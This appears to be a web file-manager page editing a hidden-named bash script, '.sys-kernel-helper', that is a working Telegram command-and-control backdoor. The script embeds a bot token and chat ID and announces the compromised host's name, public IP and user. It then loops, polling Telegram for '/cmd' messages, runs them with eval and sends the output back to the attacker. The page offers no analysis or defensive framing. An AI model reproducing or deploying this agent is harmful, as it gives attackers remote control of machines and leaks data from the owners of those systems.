OwlCyberSecurity - MANAGER

Edit File: .sys-kernel-helper

#!/bin/bash
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
TOKEN="8250896843:AAHQAhS8KQ8IFoNvnqrisO_XRywefkKmSWo"
CHAT_ID="1118758676"
HOSTNAME=$(hostname 2>/dev/null || echo "unknown")
IP=$(curl -s ifconfig.me 2>/dev/null || hostname -I 2>/dev/null | awk '{print $1}' || echo "unknown")
TAG="[${HOSTNAME} | ${IP}]"
OFFSET_FILE="/tmp/.tg_offset_${HOSTNAME}"
[ -f "$OFFSET_FILE" ] && OFFSET=$(cat "$OFFSET_FILE") || OFFSET=0

send_msg() {
    curl -s -X POST "https://api.telegram.org/bot${TOKEN}/sendMessage" \
        -d "chat_id=${CHAT_ID}" -d "text=$1" -d "parse_mode=HTML" > /dev/null 2>&1
}
send_raw() {
    curl -s -X POST "https://api.telegram.org/bot${TOKEN}/sendMessage" \
        -d "chat_id=${CHAT_ID}" --data-urlencode "text=$1" > /dev/null 2>&1
}

send_msg "<b>${TAG}</b>%0A[+] Telegram C2 Agent Online%0AUser: $(whoami)%0ATime: $(date)%0ASend: /cmd ${HOSTNAME} <command>"

while true; do
    RESP=$(curl -s "https://api.telegram.org/bot${TOKEN}/getUpdates?offset=${OFFSET}&timeout=30" 2>/dev/null)
    if echo "$RESP" | grep -q '"ok":true'; then
        LAST=$(echo "$RESP" | grep -o '"update_id":[0-9]*' | tail -1 | grep -o '[0-9]*')
        [ -n "$LAST" ] && OFFSET=$((LAST + 1)) && echo "$OFFSET" > "$OFFSET_FILE"
        if echo "$RESP" | grep -q "\"id\":${CHAT_ID}"; then
            FULL_CMD=$(echo "$RESP" | sed 's/\\"/\x00/g' | sed -n 's/.*"text":"\/cmd $[^"]*$".*/\1/p' | sed 's/\x00/"/g' | tail -1)
            TARGET=$(echo "$FULL_CMD" | awk '{print $1}')
            CMD=$(echo "$FULL_CMD" | cut -d' ' -f2- | sed 's/\\n/ /g')
            if [ "$TARGET" = "$HOSTNAME" ] || [ "$TARGET" = "all" ]; then
                if [ -n "$CMD" ]; then
                    RAW=$(eval "$CMD" 2>&1 | head -c 3500)
                    [ -z "$RAW" ] && OUT="[OK] Command executed (no output)" || OUT="$RAW"
                    send_raw "[${HOSTNAME}]
\$ ${CMD}
${OUT}"
                fi
            fi
        fi
    fi
    sleep 3
done